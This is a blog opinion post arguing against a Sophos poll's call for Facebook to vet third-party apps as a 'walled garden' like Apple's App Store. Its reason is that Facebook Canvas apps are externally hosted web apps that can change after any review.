Facebook Platform as walled garden – How Sophos got it wrong

ApplesAndOranges Graham Cluley from Sophos, a leading internet security company, recently published a piece entitled Facebook users call for application “walled garden” to protect against attacks. In it, he asks the simple question: ”Should Facebook follow Apple’s example, and have a ‘walled garden’, verifying all apps?”. 1025 of his blog readers responded to the poll, 95% of them with YES!

The results of the poll should come as no surprise. Security/privacy is always a hot topic for Facebook, and saying that you’re not for better security is akin to also being against motherhood and apple pie. It’s true that there are malicious Facebook apps, but is a walled garden approach correct? I say no.

Let’s look at the facts. Apple has a great opportunity to wall off it’s garden with the App Store. If you’re a developer and want to distribute your app, you need to go through Apple. They’ll take it and verify (to some extent) that it isn’t malicious, as well as verifying that it fits into the Apple World View (i.e. no “bad stuff” or treading too close to something Apple wants for itself). Once done, it’s put on some server just waiting for people to download and use it on their iPhone.

That ain’t how Facebook works. Facebook apps are simply web applications that are proxied by Facebook. (I’ll just discuss Canvas apps here, as Connect apps REALLY can’t be policed) There’s no “server repository” for Facebook apps – they’re hosted by their developers on their own server equipment, Amazon AWS, Joyent, Rackspace, or any of the thousands of other places to host web apps. It’s like this because that’s how the Platform is defined, and how it needs to be defined. If you don’t like that and want it changed, then you don’t understand how the Facebook Platform architecture works.

And that’s where the problems start if Facebook tried to “walled garden” its third-party developed Platform apps. Facebook cannot vet them like Apple vets iPhone apps because tomorrow the app can, and probably will change. Since it’s hosted externally, Facebook cannot control, or even know about this change. Even if Facebook threw lots of money at the problem and hired loads of people to vet every app that was put on the Platform, it would be really easy for malicious people to get around this.

So sorry Sophos, getting better security is what everyone wants, but Facebook cannot “walled garden” its Platform like Apple does because they’re very different. Comparing Apple to Facebook is like comparing apples to …. well, you get the idea.